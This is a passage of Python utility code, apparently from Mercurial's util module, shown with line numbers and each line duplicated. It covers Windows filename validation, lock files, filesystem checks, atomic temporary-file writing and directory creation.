1198 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1198 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1199 _winreservedchars = ':*?"<>|'
1199 _winreservedchars = ':*?"<>|'
1200 def checkwinfilename(path):
1200 def checkwinfilename(path):
1201 r'''Check that the base-relative path is a valid filename on Windows.
1201 r'''Check that the base-relative path is a valid filename on Windows.
1202 Returns None if the path is ok, or a UI string describing the problem.
1202 Returns None if the path is ok, or a UI string describing the problem.
1203
1203
1204 >>> checkwinfilename("just/a/normal/path")
1204 >>> checkwinfilename("just/a/normal/path")
1205 >>> checkwinfilename("foo/bar/con.xml")
1205 >>> checkwinfilename("foo/bar/con.xml")
1206 "filename contains 'con', which is reserved on Windows"
1206 "filename contains 'con', which is reserved on Windows"
1207 >>> checkwinfilename("foo/con.xml/bar")
1207 >>> checkwinfilename("foo/con.xml/bar")
1208 "filename contains 'con', which is reserved on Windows"
1208 "filename contains 'con', which is reserved on Windows"
1209 >>> checkwinfilename("foo/bar/xml.con")
1209 >>> checkwinfilename("foo/bar/xml.con")
1210 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1210 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1211 "filename contains 'AUX', which is reserved on Windows"
1211 "filename contains 'AUX', which is reserved on Windows"
1212 >>> checkwinfilename("foo/bar/bla:.txt")
1212 >>> checkwinfilename("foo/bar/bla:.txt")
1213 "filename contains ':', which is reserved on Windows"
1213 "filename contains ':', which is reserved on Windows"
1214 >>> checkwinfilename("foo/bar/b\07la.txt")
1214 >>> checkwinfilename("foo/bar/b\07la.txt")
1215 "filename contains '\\x07', which is invalid on Windows"
1215 "filename contains '\\x07', which is invalid on Windows"
1216 >>> checkwinfilename("foo/bar/bla ")
1216 >>> checkwinfilename("foo/bar/bla ")
1217 "filename ends with ' ', which is not allowed on Windows"
1217 "filename ends with ' ', which is not allowed on Windows"
1218 >>> checkwinfilename("../bar")
1218 >>> checkwinfilename("../bar")
1219 >>> checkwinfilename("foo\\")
1219 >>> checkwinfilename("foo\\")
1220 "filename ends with '\\', which is invalid on Windows"
1220 "filename ends with '\\', which is invalid on Windows"
1221 >>> checkwinfilename("foo\\/bar")
1221 >>> checkwinfilename("foo\\/bar")
1222 "directory name ends with '\\', which is invalid on Windows"
1222 "directory name ends with '\\', which is invalid on Windows"
1223 '''
1223 '''
1224 if path.endswith('\\'):
1224 if path.endswith('\\'):
1225 return _("filename ends with '\\', which is invalid on Windows")
1225 return _("filename ends with '\\', which is invalid on Windows")
1226 if '\\/' in path:
1226 if '\\/' in path:
1227 return _("directory name ends with '\\', which is invalid on Windows")
1227 return _("directory name ends with '\\', which is invalid on Windows")
1228 for n in path.replace('\\', '/').split('/'):
1228 for n in path.replace('\\', '/').split('/'):
1229 if not n:
1229 if not n:
1230 continue
1230 continue
1231 for c in _filenamebytestr(n):
1231 for c in _filenamebytestr(n):
1232 if c in _winreservedchars:
1232 if c in _winreservedchars:
1233 return _("filename contains '%s', which is reserved "
1233 return _("filename contains '%s', which is reserved "
1234 "on Windows") % c
1234 "on Windows") % c
1235 if ord(c) <= 31:
1235 if ord(c) <= 31:
1236 return _("filename contains %r, which is invalid "
1236 return _("filename contains %r, which is invalid "
1237 "on Windows") % c
1237 "on Windows") % c
1238 base = n.split('.')[0]
1238 base = n.split('.')[0]
1239 if base and base.lower() in _winreservednames:
1239 if base and base.lower() in _winreservednames:
1240 return _("filename contains '%s', which is reserved "
1240 return _("filename contains '%s', which is reserved "
1241 "on Windows") % base
1241 "on Windows") % base
1242 t = n[-1]
1242 t = n[-1]
1243 if t in '. ' and n not in '..':
1243 if t in '. ' and n not in '..':
1244 return _("filename ends with '%s', which is not allowed "
1244 return _("filename ends with '%s', which is not allowed "
1245 "on Windows") % t
1245 "on Windows") % t
1246
1246
1247 if pycompat.osname == 'nt':
1247 if pycompat.osname == 'nt':
1248 checkosfilename = checkwinfilename
1248 checkosfilename = checkwinfilename
1249 timer = time.clock
1249 timer = time.clock
1250 else:
1250 else:
1251 checkosfilename = platform.checkosfilename
1251 checkosfilename = platform.checkosfilename
1252 timer = time.time
1252 timer = time.time
1253
1253
1254 if safehasattr(time, "perf_counter"):
1254 if safehasattr(time, "perf_counter"):
1255 timer = time.perf_counter
1255 timer = time.perf_counter
1256
1256
1257 def makelock(info, pathname):
1257 def makelock(info, pathname):
1258 try:
1258 try:
1259 return os.symlink(info, pathname)
1259 return os.symlink(info, pathname)
1260 except OSError as why:
1260 except OSError as why:
1261 if why.errno == errno.EEXIST:
1261 if why.errno == errno.EEXIST:
1262 raise
1262 raise
1263 except AttributeError: # no symlink in os
1263 except AttributeError: # no symlink in os
1264 pass
1264 pass
1265
1265
1266 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1266 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1267 os.write(ld, info)
1267 os.write(ld, info)
1268 os.close(ld)
1268 os.close(ld)
1269
1269
1270 def readlock(pathname):
1270 def readlock(pathname):
1271 try:
1271 try:
1272 return os.readlink(pathname)
1272 return os.readlink(pathname)
1273 except OSError as why:
1273 except OSError as why:
1274 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1274 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1275 raise
1275 raise
1276 except AttributeError: # no symlink in os
1276 except AttributeError: # no symlink in os
1277 pass
1277 pass
1278 fp = posixfile(pathname)
1278 fp = posixfile(pathname)
1279 r = fp.read()
1279 r = fp.read()
1280 fp.close()
1280 fp.close()
1281 return r
1281 return r
1282
1282
1283 def fstat(fp):
1283 def fstat(fp):
1284 '''stat file object that may not have fileno method.'''
1284 '''stat file object that may not have fileno method.'''
1285 try:
1285 try:
1286 return os.fstat(fp.fileno())
1286 return os.fstat(fp.fileno())
1287 except AttributeError:
1287 except AttributeError:
1288 return os.stat(fp.name)
1288 return os.stat(fp.name)
1289
1289
1290 # File system features
1290 # File system features
1291
1291
1292 def fscasesensitive(path):
1292 def fscasesensitive(path):
1293 """
1293 """
1294 Return true if the given path is on a case-sensitive filesystem
1294 Return true if the given path is on a case-sensitive filesystem
1295
1295
1296 Requires a path (like /foo/.hg) ending with a foldable final
1296 Requires a path (like /foo/.hg) ending with a foldable final
1297 directory component.
1297 directory component.
1298 """
1298 """
1299 s1 = os.lstat(path)
1299 s1 = os.lstat(path)
1300 d, b = os.path.split(path)
1300 d, b = os.path.split(path)
1301 b2 = b.upper()
1301 b2 = b.upper()
1302 if b == b2:
1302 if b == b2:
1303 b2 = b.lower()
1303 b2 = b.lower()
1304 if b == b2:
1304 if b == b2:
1305 return True # no evidence against case sensitivity
1305 return True # no evidence against case sensitivity
1306 p2 = os.path.join(d, b2)
1306 p2 = os.path.join(d, b2)
1307 try:
1307 try:
1308 s2 = os.lstat(p2)
1308 s2 = os.lstat(p2)
1309 if s2 == s1:
1309 if s2 == s1:
1310 return False
1310 return False
1311 return True
1311 return True
1312 except OSError:
1312 except OSError:
1313 return True
1313 return True
1314
1314
1315 try:
1315 try:
1316 import re2
1316 import re2
1317 _re2 = None
1317 _re2 = None
1318 except ImportError:
1318 except ImportError:
1319 _re2 = False
1319 _re2 = False
1320
1320
1321 class _re(object):
1321 class _re(object):
1322 def _checkre2(self):
1322 def _checkre2(self):
1323 global _re2
1323 global _re2
1324 try:
1324 try:
1325 # check if match works, see issue3964
1325 # check if match works, see issue3964
1326 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1326 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1327 except ImportError:
1327 except ImportError:
1328 _re2 = False
1328 _re2 = False
1329
1329
1330 def compile(self, pat, flags=0):
1330 def compile(self, pat, flags=0):
1331 '''Compile a regular expression, using re2 if possible
1331 '''Compile a regular expression, using re2 if possible
1332
1332
1333 For best performance, use only re2-compatible regexp features. The
1333 For best performance, use only re2-compatible regexp features. The
1334 only flags from the re module that are re2-compatible are
1334 only flags from the re module that are re2-compatible are
1335 IGNORECASE and MULTILINE.'''
1335 IGNORECASE and MULTILINE.'''
1336 if _re2 is None:
1336 if _re2 is None:
1337 self._checkre2()
1337 self._checkre2()
1338 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1338 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1339 if flags & remod.IGNORECASE:
1339 if flags & remod.IGNORECASE:
1340 pat = '(?i)' + pat
1340 pat = '(?i)' + pat
1341 if flags & remod.MULTILINE:
1341 if flags & remod.MULTILINE:
1342 pat = '(?m)' + pat
1342 pat = '(?m)' + pat
1343 try:
1343 try:
1344 return re2.compile(pat)
1344 return re2.compile(pat)
1345 except re2.error:
1345 except re2.error:
1346 pass
1346 pass
1347 return remod.compile(pat, flags)
1347 return remod.compile(pat, flags)
1348
1348
1349 @propertycache
1349 @propertycache
1350 def escape(self):
1350 def escape(self):
1351 '''Return the version of escape corresponding to self.compile.
1351 '''Return the version of escape corresponding to self.compile.
1352
1352
1353 This is imperfect because whether re2 or re is used for a particular
1353 This is imperfect because whether re2 or re is used for a particular
1354 function depends on the flags, etc, but it's the best we can do.
1354 function depends on the flags, etc, but it's the best we can do.
1355 '''
1355 '''
1356 global _re2
1356 global _re2
1357 if _re2 is None:
1357 if _re2 is None:
1358 self._checkre2()
1358 self._checkre2()
1359 if _re2:
1359 if _re2:
1360 return re2.escape
1360 return re2.escape
1361 else:
1361 else:
1362 return remod.escape
1362 return remod.escape
1363
1363
1364 re = _re()
1364 re = _re()
1365
1365
1366 _fspathcache = {}
1366 _fspathcache = {}
1367 def fspath(name, root):
1367 def fspath(name, root):
1368 '''Get name in the case stored in the filesystem
1368 '''Get name in the case stored in the filesystem
1369
1369
1370 The name should be relative to root, and be normcase-ed for efficiency.
1370 The name should be relative to root, and be normcase-ed for efficiency.
1371
1371
1372 Note that this function is unnecessary, and should not be
1372 Note that this function is unnecessary, and should not be
1373 called, for case-sensitive filesystems (simply because it's expensive).
1373 called, for case-sensitive filesystems (simply because it's expensive).
1374
1374
1375 The root should be normcase-ed, too.
1375 The root should be normcase-ed, too.
1376 '''
1376 '''
1377 def _makefspathcacheentry(dir):
1377 def _makefspathcacheentry(dir):
1378 return dict((normcase(n), n) for n in os.listdir(dir))
1378 return dict((normcase(n), n) for n in os.listdir(dir))
1379
1379
1380 seps = pycompat.ossep
1380 seps = pycompat.ossep
1381 if pycompat.osaltsep:
1381 if pycompat.osaltsep:
1382 seps = seps + pycompat.osaltsep
1382 seps = seps + pycompat.osaltsep
1383 # Protect backslashes. This gets silly very quickly.
1383 # Protect backslashes. This gets silly very quickly.
1384 seps.replace('\\','\\\\')
1384 seps.replace('\\','\\\\')
1385 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1385 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1386 dir = os.path.normpath(root)
1386 dir = os.path.normpath(root)
1387 result = []
1387 result = []
1388 for part, sep in pattern.findall(name):
1388 for part, sep in pattern.findall(name):
1389 if sep:
1389 if sep:
1390 result.append(sep)
1390 result.append(sep)
1391 continue
1391 continue
1392
1392
1393 if dir not in _fspathcache:
1393 if dir not in _fspathcache:
1394 _fspathcache[dir] = _makefspathcacheentry(dir)
1394 _fspathcache[dir] = _makefspathcacheentry(dir)
1395 contents = _fspathcache[dir]
1395 contents = _fspathcache[dir]
1396
1396
1397 found = contents.get(part)
1397 found = contents.get(part)
1398 if not found:
1398 if not found:
1399 # retry "once per directory" per "dirstate.walk" which
1399 # retry "once per directory" per "dirstate.walk" which
1400 # may take place for each patches of "hg qpush", for example
1400 # may take place for each patches of "hg qpush", for example
1401 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1401 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1402 found = contents.get(part)
1402 found = contents.get(part)
1403
1403
1404 result.append(found or part)
1404 result.append(found or part)
1405 dir = os.path.join(dir, part)
1405 dir = os.path.join(dir, part)
1406
1406
1407 return ''.join(result)
1407 return ''.join(result)
1408
1408
1409 def getfstype(dirpath):
1409 def getfstype(dirpath):
1410 '''Get the filesystem type name from a directory (best-effort)
1410 '''Get the filesystem type name from a directory (best-effort)
1411
1411
1412 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1412 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1413 '''
1413 '''
1414 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1414 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1415
1415
1416 def checknlink(testfile):
1416 def checknlink(testfile):
1417 '''check whether hardlink count reporting works properly'''
1417 '''check whether hardlink count reporting works properly'''
1418
1418
1419 # testfile may be open, so we need a separate file for checking to
1419 # testfile may be open, so we need a separate file for checking to
1420 # work around issue2543 (or testfile may get lost on Samba shares)
1420 # work around issue2543 (or testfile may get lost on Samba shares)
1421 f1 = testfile + ".hgtmp1"
1421 f1 = testfile + ".hgtmp1"
1422 if os.path.lexists(f1):
1422 if os.path.lexists(f1):
1423 return False
1423 return False
1424 try:
1424 try:
1425 posixfile(f1, 'w').close()
1425 posixfile(f1, 'w').close()
1426 except IOError:
1426 except IOError:
1427 try:
1427 try:
1428 os.unlink(f1)
1428 os.unlink(f1)
1429 except OSError:
1429 except OSError:
1430 pass
1430 pass
1431 return False
1431 return False
1432
1432
1433 f2 = testfile + ".hgtmp2"
1433 f2 = testfile + ".hgtmp2"
1434 fd = None
1434 fd = None
1435 try:
1435 try:
1436 oslink(f1, f2)
1436 oslink(f1, f2)
1437 # nlinks() may behave differently for files on Windows shares if
1437 # nlinks() may behave differently for files on Windows shares if
1438 # the file is open.
1438 # the file is open.
1439 fd = posixfile(f2)
1439 fd = posixfile(f2)
1440 return nlinks(f2) > 1
1440 return nlinks(f2) > 1
1441 except OSError:
1441 except OSError:
1442 return False
1442 return False
1443 finally:
1443 finally:
1444 if fd is not None:
1444 if fd is not None:
1445 fd.close()
1445 fd.close()
1446 for f in (f1, f2):
1446 for f in (f1, f2):
1447 try:
1447 try:
1448 os.unlink(f)
1448 os.unlink(f)
1449 except OSError:
1449 except OSError:
1450 pass
1450 pass
1451
1451
1452 def endswithsep(path):
1452 def endswithsep(path):
1453 '''Check path ends with os.sep or os.altsep.'''
1453 '''Check path ends with os.sep or os.altsep.'''
1454 return (path.endswith(pycompat.ossep)
1454 return (path.endswith(pycompat.ossep)
1455 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1455 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1456
1456
1457 def splitpath(path):
1457 def splitpath(path):
1458 '''Split path by os.sep.
1458 '''Split path by os.sep.
1459 Note that this function does not use os.altsep because this is
1459 Note that this function does not use os.altsep because this is
1460 an alternative of simple "xxx.split(os.sep)".
1460 an alternative of simple "xxx.split(os.sep)".
1461 It is recommended to use os.path.normpath() before using this
1461 It is recommended to use os.path.normpath() before using this
1462 function if need.'''
1462 function if need.'''
1463 return path.split(pycompat.ossep)
1463 return path.split(pycompat.ossep)
1464
1464
1465 def gui():
1465 def gui():
1466 '''Are we running in a GUI?'''
1466 '''Are we running in a GUI?'''
1467 if pycompat.sysplatform == 'darwin':
1467 if pycompat.sysplatform == 'darwin':
1468 if 'SSH_CONNECTION' in encoding.environ:
1468 if 'SSH_CONNECTION' in encoding.environ:
1469 # handle SSH access to a box where the user is logged in
1469 # handle SSH access to a box where the user is logged in
1470 return False
1470 return False
1471 elif getattr(osutil, 'isgui', None):
1471 elif getattr(osutil, 'isgui', None):
1472 # check if a CoreGraphics session is available
1472 # check if a CoreGraphics session is available
1473 return osutil.isgui()
1473 return osutil.isgui()
1474 else:
1474 else:
1475 # pure build; use a safe default
1475 # pure build; use a safe default
1476 return True
1476 return True
1477 else:
1477 else:
1478 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1478 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1479
1479
1480 def mktempcopy(name, emptyok=False, createmode=None):
1480 def mktempcopy(name, emptyok=False, createmode=None):
1481 """Create a temporary file with the same contents from name
1481 """Create a temporary file with the same contents from name
1482
1482
1483 The permission bits are copied from the original file.
1483 The permission bits are copied from the original file.
1484
1484
1485 If the temporary file is going to be truncated immediately, you
1485 If the temporary file is going to be truncated immediately, you
1486 can use emptyok=True as an optimization.
1486 can use emptyok=True as an optimization.
1487
1487
1488 Returns the name of the temporary file.
1488 Returns the name of the temporary file.
1489 """
1489 """
1490 d, fn = os.path.split(name)
1490 d, fn = os.path.split(name)
1491 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1491 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1492 os.close(fd)
1492 os.close(fd)
1493 # Temporary files are created with mode 0600, which is usually not
1493 # Temporary files are created with mode 0600, which is usually not
1494 # what we want. If the original file already exists, just copy
1494 # what we want. If the original file already exists, just copy
1495 # its mode. Otherwise, manually obey umask.
1495 # its mode. Otherwise, manually obey umask.
1496 copymode(name, temp, createmode)
1496 copymode(name, temp, createmode)
1497 if emptyok:
1497 if emptyok:
1498 return temp
1498 return temp
1499 try:
1499 try:
1500 try:
1500 try:
1501 ifp = posixfile(name, "rb")
1501 ifp = posixfile(name, "rb")
1502 except IOError as inst:
1502 except IOError as inst:
1503 if inst.errno == errno.ENOENT:
1503 if inst.errno == errno.ENOENT:
1504 return temp
1504 return temp
1505 if not getattr(inst, 'filename', None):
1505 if not getattr(inst, 'filename', None):
1506 inst.filename = name
1506 inst.filename = name
1507 raise
1507 raise
1508 ofp = posixfile(temp, "wb")
1508 ofp = posixfile(temp, "wb")
1509 for chunk in filechunkiter(ifp):
1509 for chunk in filechunkiter(ifp):
1510 ofp.write(chunk)
1510 ofp.write(chunk)
1511 ifp.close()
1511 ifp.close()
1512 ofp.close()
1512 ofp.close()
1513 except: # re-raises
1513 except: # re-raises
1514 try: os.unlink(temp)
1514 try: os.unlink(temp)
1515 except OSError: pass
1515 except OSError: pass
1516 raise
1516 raise
1517 return temp
1517 return temp
1518
1518
1519 class filestat(object):
1519 class filestat(object):
1520 """help to exactly detect change of a file
1520 """help to exactly detect change of a file
1521
1521
1522 'stat' attribute is result of 'os.stat()' if specified 'path'
1522 'stat' attribute is result of 'os.stat()' if specified 'path'
1523 exists. Otherwise, it is None. This can avoid preparative
1523 exists. Otherwise, it is None. This can avoid preparative
1524 'exists()' examination on client side of this class.
1524 'exists()' examination on client side of this class.
1525 """
1525 """
1526 def __init__(self, stat):
1526 def __init__(self, stat):
1527 self.stat = stat
1527 self.stat = stat
1528
1528
1529 @classmethod
1529 @classmethod
1530 def frompath(cls, path):
1530 def frompath(cls, path):
1531 try:
1531 try:
1532 stat = os.stat(path)
1532 stat = os.stat(path)
1533 except OSError as err:
1533 except OSError as err:
1534 if err.errno != errno.ENOENT:
1534 if err.errno != errno.ENOENT:
1535 raise
1535 raise
1536 stat = None
1536 stat = None
1537 return cls(stat)
1537 return cls(stat)
1538
1538
1539 @classmethod
1539 @classmethod
1540 def fromfp(cls, fp):
1540 def fromfp(cls, fp):
1541 stat = os.fstat(fp.fileno())
1541 stat = os.fstat(fp.fileno())
1542 return cls(stat)
1542 return cls(stat)
1543
1543
1544 __hash__ = object.__hash__
1544 __hash__ = object.__hash__
1545
1545
1546 def __eq__(self, old):
1546 def __eq__(self, old):
1547 try:
1547 try:
1548 # if ambiguity between stat of new and old file is
1548 # if ambiguity between stat of new and old file is
1549 # avoided, comparison of size, ctime and mtime is enough
1549 # avoided, comparison of size, ctime and mtime is enough
1550 # to exactly detect change of a file regardless of platform
1550 # to exactly detect change of a file regardless of platform
1551 return (self.stat.st_size == old.stat.st_size and
1551 return (self.stat.st_size == old.stat.st_size and
1552 self.stat.st_ctime == old.stat.st_ctime and
1552 self.stat.st_ctime == old.stat.st_ctime and
1553 self.stat.st_mtime == old.stat.st_mtime)
1553 self.stat.st_mtime == old.stat.st_mtime)
1554 except AttributeError:
1554 except AttributeError:
1555 pass
1555 pass
1556 try:
1556 try:
1557 return self.stat is None and old.stat is None
1557 return self.stat is None and old.stat is None
1558 except AttributeError:
1558 except AttributeError:
1559 return False
1559 return False
1560
1560
1561 def isambig(self, old):
1561 def isambig(self, old):
1562 """Examine whether new (= self) stat is ambiguous against old one
1562 """Examine whether new (= self) stat is ambiguous against old one
1563
1563
1564 "S[N]" below means stat of a file at N-th change:
1564 "S[N]" below means stat of a file at N-th change:
1565
1565
1566 - S[n-1].ctime < S[n].ctime: can detect change of a file
1566 - S[n-1].ctime < S[n].ctime: can detect change of a file
1567 - S[n-1].ctime == S[n].ctime
1567 - S[n-1].ctime == S[n].ctime
1568 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1568 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1569 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1569 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1570 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1570 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1571 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1571 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1572
1572
1573 Case (*2) above means that a file was changed twice or more at
1573 Case (*2) above means that a file was changed twice or more at
1574 same time in sec (= S[n-1].ctime), and comparison of timestamp
1574 same time in sec (= S[n-1].ctime), and comparison of timestamp
1575 is ambiguous.
1575 is ambiguous.
1576
1576
1577 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1577 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1578 timestamp is ambiguous".
1578 timestamp is ambiguous".
1579
1579
1580 But advancing mtime only in case (*2) doesn't work as
1580 But advancing mtime only in case (*2) doesn't work as
1581 expected, because naturally advanced S[n].mtime in case (*1)
1581 expected, because naturally advanced S[n].mtime in case (*1)
1582 might be equal to manually advanced S[n-1 or earlier].mtime.
1582 might be equal to manually advanced S[n-1 or earlier].mtime.
1583
1583
1584 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1584 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1585 treated as ambiguous regardless of mtime, to avoid overlooking
1585 treated as ambiguous regardless of mtime, to avoid overlooking
1586 by confliction between such mtime.
1586 by confliction between such mtime.
1587
1587
1588 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1588 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1589 S[n].mtime", even if size of a file isn't changed.
1589 S[n].mtime", even if size of a file isn't changed.
1590 """
1590 """
1591 try:
1591 try:
1592 return (self.stat.st_ctime == old.stat.st_ctime)
1592 return (self.stat.st_ctime == old.stat.st_ctime)
1593 except AttributeError:
1593 except AttributeError:
1594 return False
1594 return False
1595
1595
1596 def avoidambig(self, path, old):
1596 def avoidambig(self, path, old):
1597 """Change file stat of specified path to avoid ambiguity
1597 """Change file stat of specified path to avoid ambiguity
1598
1598
1599 'old' should be previous filestat of 'path'.
1599 'old' should be previous filestat of 'path'.
1600
1600
1601 This skips avoiding ambiguity, if a process doesn't have
1601 This skips avoiding ambiguity, if a process doesn't have
1602 appropriate privileges for 'path'. This returns False in this
1602 appropriate privileges for 'path'. This returns False in this
1603 case.
1603 case.
1604
1604
1605 Otherwise, this returns True, as "ambiguity is avoided".
1605 Otherwise, this returns True, as "ambiguity is avoided".
1606 """
1606 """
1607 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1607 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1608 try:
1608 try:
1609 os.utime(path, (advanced, advanced))
1609 os.utime(path, (advanced, advanced))
1610 except OSError as inst:
1610 except OSError as inst:
1611 if inst.errno == errno.EPERM:
1611 if inst.errno == errno.EPERM:
1612 # utime() on the file created by another user causes EPERM,
1612 # utime() on the file created by another user causes EPERM,
1613 # if a process doesn't have appropriate privileges
1613 # if a process doesn't have appropriate privileges
1614 return False
1614 return False
1615 raise
1615 raise
1616 return True
1616 return True
1617
1617
1618 def __ne__(self, other):
1618 def __ne__(self, other):
1619 return not self == other
1619 return not self == other
1620
1620
1621 class atomictempfile(object):
1621 class atomictempfile(object):
1622 '''writable file object that atomically updates a file
1622 '''writable file object that atomically updates a file
1623
1623
1624 All writes will go to a temporary copy of the original file. Call
1624 All writes will go to a temporary copy of the original file. Call
1625 close() when you are done writing, and atomictempfile will rename
1625 close() when you are done writing, and atomictempfile will rename
1626 the temporary copy to the original name, making the changes
1626 the temporary copy to the original name, making the changes
1627 visible. If the object is destroyed without being closed, all your
1627 visible. If the object is destroyed without being closed, all your
1628 writes are discarded.
1628 writes are discarded.
1629
1629
1630 checkambig argument of constructor is used with filestat, and is
1630 checkambig argument of constructor is used with filestat, and is
1631 useful only if target file is guarded by any lock (e.g. repo.lock
1631 useful only if target file is guarded by any lock (e.g. repo.lock
1632 or repo.wlock).
1632 or repo.wlock).
1633 '''
1633 '''
1634 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1634 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1635 self.__name = name # permanent name
1635 self.__name = name # permanent name
1636 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1636 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1637 createmode=createmode)
1637 createmode=createmode)
1638 self._fp = posixfile(self._tempname, mode)
1638 self._fp = posixfile(self._tempname, mode)
1639 self._checkambig = checkambig
1639 self._checkambig = checkambig
1640
1640
1641 # delegated methods
1641 # delegated methods
1642 self.read = self._fp.read
1642 self.read = self._fp.read
1643 self.write = self._fp.write
1643 self.write = self._fp.write
1644 self.seek = self._fp.seek
1644 self.seek = self._fp.seek
1645 self.tell = self._fp.tell
1645 self.tell = self._fp.tell
1646 self.fileno = self._fp.fileno
1646 self.fileno = self._fp.fileno
1647
1647
1648 def close(self):
1648 def close(self):
1649 if not self._fp.closed:
1649 if not self._fp.closed:
1650 self._fp.close()
1650 self._fp.close()
1651 filename = localpath(self.__name)
1651 filename = localpath(self.__name)
1652 oldstat = self._checkambig and filestat.frompath(filename)
1652 oldstat = self._checkambig and filestat.frompath(filename)
1653 if oldstat and oldstat.stat:
1653 if oldstat and oldstat.stat:
1654 rename(self._tempname, filename)
1654 rename(self._tempname, filename)
1655 newstat = filestat.frompath(filename)
1655 newstat = filestat.frompath(filename)
1656 if newstat.isambig(oldstat):
1656 if newstat.isambig(oldstat):
1657 # stat of changed file is ambiguous to original one
1657 # stat of changed file is ambiguous to original one
1658 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1658 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1659 os.utime(filename, (advanced, advanced))
1659 os.utime(filename, (advanced, advanced))
1660 else:
1660 else:
1661 rename(self._tempname, filename)
1661 rename(self._tempname, filename)
1662
1662
1663 def discard(self):
1663 def discard(self):
1664 if not self._fp.closed:
1664 if not self._fp.closed:
1665 try:
1665 try:
1666 os.unlink(self._tempname)
1666 os.unlink(self._tempname)
1667 except OSError:
1667 except OSError:
1668 pass
1668 pass
1669 self._fp.close()
1669 self._fp.close()
1670
1670
1671 def __del__(self):
1671 def __del__(self):
1672 if safehasattr(self, '_fp'): # constructor actually did something
1672 if safehasattr(self, '_fp'): # constructor actually did something
1673 self.discard()
1673 self.discard()
1674
1674
1675 def __enter__(self):
1675 def __enter__(self):
1676 return self
1676 return self
1677
1677
1678 def __exit__(self, exctype, excvalue, traceback):
1678 def __exit__(self, exctype, excvalue, traceback):
1679 if exctype is not None:
1679 if exctype is not None:
1680 self.discard()
1680 self.discard()
1681 else:
1681 else:
1682 self.close()
1682 self.close()
1683
1683
1684 def unlinkpath(f, ignoremissing=False):
1684 def unlinkpath(f, ignoremissing=False):
1685 """unlink and remove the directory if it is empty"""
1685 """unlink and remove the directory if it is empty"""
1686 if ignoremissing:
1686 if ignoremissing:
1687 tryunlink(f)
1687 tryunlink(f)
1688 else:
1688 else:
1689 unlink(f)
1689 unlink(f)
1690 # try removing directories that might now be empty
1690 # try removing directories that might now be empty
1691 try:
1691 try:
1692 removedirs(os.path.dirname(f))
1692 removedirs(os.path.dirname(f))
1693 except OSError:
1693 except OSError:
1694 pass
1694 pass
1695
1695
1696 def tryunlink(f):
1696 def tryunlink(f):
1697 """Attempt to remove a file, ignoring ENOENT errors."""
1697 """Attempt to remove a file, ignoring ENOENT errors."""
1698 try:
1698 try:
1699 unlink(f)
1699 unlink(f)
1700 except OSError as e:
1700 except OSError as e:
1701 if e.errno != errno.ENOENT:
1701 if e.errno != errno.ENOENT:
1702 raise
1702 raise
1703
1703
1704 def makedirs(name, mode=None, notindexed=False):
1704 def makedirs(name, mode=None, notindexed=False):
1705 """recursive directory creation with parent mode inheritance
1705 """recursive directory creation with parent mode inheritance
1706
1706
1707 Newly created directories are marked as "not to be indexed by
1707 Newly created directories are marked as "not to be indexed by
1708 the content indexing service", if ``notindexed`` is specified
1708 the content indexing service", if ``notindexed`` is specified
1709 for "write" mode access.
1709 for "write" mode access.
1710 """
1710 """
1711 try:
1711 try:
1712 makedir(name, notindexed)
1712 makedir(name, notindexed)
1713 except OSError as err:
1713 except OSError as err:
1714 if err.errno == errno.EEXIST:
1714 if err.errno == errno.EEXIST:
1715 return
1715 return
1716 if err.errno != errno.ENOENT or not name:
1716 if err.errno != errno.ENOENT or not name:
1717 raise
1717 raise
1718 parent = os.path.dirname(os.path.abspath(name))
1718 parent = os.path.dirname(os.path.abspath(name))
1719 if parent == name:
1719 if parent == name:
1720 raise
1720 raise
1721 makedirs(parent, mode, notindexed)
1721 makedirs(parent, mode, notindexed)
1722 try:
1722 try:
1723 makedir(name, notindexed)
